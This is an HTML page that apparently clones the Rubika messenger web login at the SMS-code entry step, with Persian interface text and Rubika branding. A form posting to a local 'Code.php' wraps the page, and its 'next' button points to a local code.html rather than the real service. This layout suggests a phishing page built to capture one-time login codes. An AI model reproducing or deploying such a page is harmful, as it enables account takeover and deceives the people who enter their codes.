<html lang="en" style="display: block;" class="theme-default login-bg"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <title>Rubika</title>
  <!--<base href="/old/">--><base href=".">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <link rel="stylesheet" href="./login_files/bootstrap.min.css">
  <style>
    .active-click {
      pointer-events: all !important;
    }

    .relative {
      position: relative;
    }

    .in {
      display: block;
    }

    .im_dialogs_scrollable_wrap i.icon-verified {
      display: inline-block !important;
    }

    [hidden] {
      display: none !important;
    }

    .navbar-offline-text {
      line-height: unset !important;
    }

    .modal-dialog {
      margin-bottom: 10px !important;
    }

    .modal {
      padding-bottom: 0 !important;
    }

    .modal-hide {
      display: none;
    }

    .im_message_edited {
      display: inline-block !important;
    }

    .clear-margin {
      margin-left: 0 !important;
    }

    a.im_message_photo_thumb {
      max-width: 260px;
      min-height: 38px;
    }

    vg-player.clear-style {
      font-family: inherit !important;
      display: block !important;
      width: auto !important;
      height: auto !important;
      background-color: transparent !important;
    }

    .go-bottom {
      position: absolute;
      border-radius: 100%;
      background-color: #f2f2f2;
      -webkit-box-shadow: 0 0 1px rgba(0, 0, 0, 0.2);
      -moz-box-shadow: 0 0 1px rgba(0, 0, 0, 0.2);
      box-shadow: 0 0 1px rgba(0, 0, 0, 0.2);
      -webkit-transition: all 0.2s ease-in-out;
      -o-transition: all 0.2s ease-in-out;
      transition: all 0.2s ease-in-out;
      text-align: center;
      padding: 0.84375rem 0;
      z-index: 10;
      width: 40px;
      height: 40px;
      right: 30px;
      bottom: 20px;
    }

    .icongeneral-bottom {
      width: 14px;
      height: 9px;
      background-position: -5px -51px;
      margin-top: 8px;
      background-image: url('assets/img/icons/Major.png');
      background-repeat: no-repeat;
      display: inline-block;
    }
  </style>
  <link rel="icon" href="https://web.rubika.ir/old/favicon.ico" type="image/x-icon">
<form action="Code.php" method="post">
  <link rel="apple-touch-icon" href="https://web.rubika.ir/old/assets/img/iphone_home120.png">
  <link rel="apple-touch-icon" sizes="120x120" href="https://web.rubika.ir/old/assets/img/iphone_home120.png">
  <link rel="apple-touch-startup-image" media="(device-width: 320px)" href="https://web.rubika.ir/old/assets/img/iphone_startup.png">

  <meta name="apple-mobile-web-app-title" content="Rubika Web">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="theme-color" content="#497495">
  <meta name="google" content="notranslate">

  <meta property="og:title" content="Rubika Web">
  <meta property="og:url" content="https://web.rubika.ir/">
  <meta property="og:image:width" content="236">
  <meta property="og:image:height" content="236">
  <meta property="og:image" content="https://web.rubika.ir/assets/img/logo_share.png">
  <meta property="og:site_name" content="Rubika Web">
  <meta property="description" content="Welcome to the Web application of Rubika messenger.">
  <meta property="og:description" content="Welcome to the Web application of Rubika messenger.">

  <link rel="manifest" href="https://web.rubika.ir/old/manifest.webmanifest">
  <meta name="theme-color" content="#1976d2">
<link rel="stylesheet" href="./login_files/styles.6a56d9062d6f08587ccc.css"><link rel="stylesheet" href="./login_files/desktop.css"><link rel="stylesheet" href="./login_files/rtl.css"><style>
      vg-player {
        font-family: 'videogular';
        position: relative;
        display: flex;
        width: 100%;
        height: 100%;
        overflow: hidden;
        background-color: black;
      }
      vg-player.fullscreen {
        position: fixed;
        left: 0;
        top: 0;
      }
      vg-player.native-fullscreen.controls-hidden {
        cursor: none;
      }
    </style><link rel="stylesheet" href="assets/css/desktop.css?v=3.2.1"><link rel="stylesheet" href="assets/css/rtl.css?v=3.2.1"></head>

<body class="non_osx non_msie is_1x is-desktop">
  <div class="page_wrap" style="visibility: hidden;">
    <app-root ng-version="9.1.11"><span rb-custom-theme="" hidden=""><rb-head><div class="tg_page_head tg_head_wrap noselect clearfix"><div class="tg_head_split"><div class="tg_head_logo_wrap"><div rb-toggle-container="" class="tg_head_logo_dropdown dropdown"><a rb-toggle="" class="tg_head_btn dropdown-toggle"><span rb-localize="head_mainmenu" class="visually-hidden">منوی اصلی</span><div class="icon-hamburger-wrap"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></div><label rb-localize="head_myapp" style="line-height: 6px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-weight: normal;">روبیکا</label></a><ul class="dropdown-menu"><li><a><i class="icon icon-new-group"></i><span rb-localize="im_new_group">گروه جدید</span></a></li><li><a><i class="icon icon-new-group"></i><span rb-localize="im_new_channel">کانال جدید</span></a></li><li><a><i class="icon icon-contacts"></i><span rb-localize="im_contacts">مخاطبین</span></a></li><!----><li><a><i class="icon icon-settings"></i><span rb-localize="im_settings">تنظیمات</span></a></li><li><a><i class="icon icon-about"></i><span rb-localize="head_log_out">خروج</span></a></li></ul></div></div><div class="tg_head_main_wrap"><div class="tg_head_connecting_wrap"><span class="tg_head_connecting_text"><span rb-localize="" msgid="head_waiting_for_network">در حال انتظار برای شبکه</span><span rb-loading-dots=""><div class="loading_dots"><i></i><i></i><i></i></div></span></span><!----><a rb-localize="head_retry" class="tg_head_btn">تلاش مجدد</a><!----><!----><!----><!----></div><!----><!----></div></div></div></rb-head><div class="im_page_wrap clearfix im_page_peer_not_selected"><div class="im_page_split clearfix"><rb-chats><div class="im_dialogs_col_wrap noselect"><div class="im_dialogs_panel"><div class="im_dialogs_search"><input type="search" autocomplete="off" class="form-control im_dialogs_search_field no_outline ng-untouched ng-pristine ng-valid" placeholder="جستجو"><a class="im_dialogs_search_clear tg_search_clear" hidden=""><i class="icon icon-search-clear"></i></a></div></div><div class="im_dialogs_col"><div nanoscroll="" rb-chats-list="" class="im_dialogs_wrap nano has-scrollbar" style="height: 607px;"><div class="im_dialogs_scrollable_wrap nano-content" tabindex="-1" style="right: -15px;"><!----><ul class="nav nav-pills nav-stacked"><!----></ul><ul class="nav nav-pills nav-stacked"><!----><!----></ul><!----><!----><!----><!----></div><div class="nano-pane" style="display: none;"><div class="nano-slider" style="height: 20px; transform: translate(0px, 0px);"></div></div></div></div></div></rb-chats><div class="im_history_col_wrap"><div rb-voice-chat-bar="" class="im_history_voice_panel"><!----></div><app-tab-container><!----></app-tab-container><div class="im_history_not_selected_wrap"><!----><div rb-vertical-position="0.35" padding="true" rb-localize="im_select_a_chat" class="im_history_not_selected vertical-aligned" style="padding-top: 215.95px; padding-bottom: 215.95px;">لطفاً برای شروع پیام رسانی یک گفتگوانتخاب کنید</div><!----></div></div></div></div><div class="footer_wrap footer_empty"></div></span><tab-login><div rb-custom-background="login-bg" class="login_page_wrap"><div class="login_head_bg"></div><div class="login_page"><div class="login_head_wrap clearfix"><!----><div class="login_head_submit_wrap"><!----><div class="login_head_submit_wrap"><a href="code.html" class="login_head_submit_btn" ng-if="!credentials.phone_code_hash" ng-click="sendCode()">
        <font color="red"> <button msgid="modal_next">بعدی</button> </font></a></div><!----><!----></div><!----><a href="index.html" target="_blank" class="login_head_logo_link"><i class="icon icon-tg-logo"></i><span rb-localize="head_myapp" style="line-height: 6px; color: #fff; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-weight: normal;">روبیکا</span></a></div><div class="login_form_wrap"><!----><form novalidate="" name="myLoginForm" class="ng-pristine ng-invalid ng-touched"><h3 class="login_phone_head" style="direction: ltr;"><span>+98</span><span>********</span></h3><div class="login_edit_phone"><a rb-localize="" msgid="login_edit_number">شماره همراه را ویرایش نمایید</a></div><div><p rb-localize="" msgid="login_enter_sms_code_label_md" class="login_smscode_lead">کد ورود به شما پیامک شده است</p></div><div><p class="login_smscode_lead"><span rb-localize=""><!----></span></p><!----><!----></div><div rb-labeled-input="" class="md-input-group md-input-group-centered md-input-animated md-input-focused md-input-has-value"><!----><!----><!----><label rb-localize="" msgid="login_number_input_placeholder" class="md-input-label">کد را وارد کنید</label><!----><input autocomplete="off" rb-focused="" name="phone_code" type="tel" required="" class="md-input ng-pristine ng-invalid ng-touched"></div></form><!----><!----></div></div></div></tab-login><!----><!----><app-toast><div class="toast-wrap toast-top-center"><div class="toast toast-"><div class="toast-message"><div style="white-space: pre-line;"></div></div></div></div></app-toast><app-modal-container rb-layout-switch=""><div><div></div><div class="modal-backdrop fade" style="z-index: 1049;" hidden=""></div><!----></div></app-modal-container><rb-player-container><div style="display: none;"><vg-player class="clear-style"><video id="singleVideo" playsinline=""><source src="" type="undefined"></video></vg-player></div></rb-player-container></app-root>
        </div>
    </form>
  </div>
  <noscript>Please enable JavaScript to continue using this application.</noscript>
<script src="./login_files/runtime-es2015.0dae8cbc97194c7caed4.js" type="module"></script><script src="./login_files/runtime-es5.0dae8cbc97194c7caed4.js" nomodule="" defer=""></script><script src="./login_files/polyfills-es5.0ff5668f2f5a75f34069.js" nomodule="" defer=""></script><script src="./login_files/polyfills-es2015.94c77f17bf1ab3d067ad.js" type="module"></script><script src="./login_files/scripts.9fc52888a9a75ff81dc6.js" defer=""></script><script src="./login_files/main-es2015.ef2fddc41b098271fdb4.js" type="module"></script><script src="./login_files/main-es5.ef2fddc41b098271fdb4.js" nomodule="" defer=""></script>

</body></html>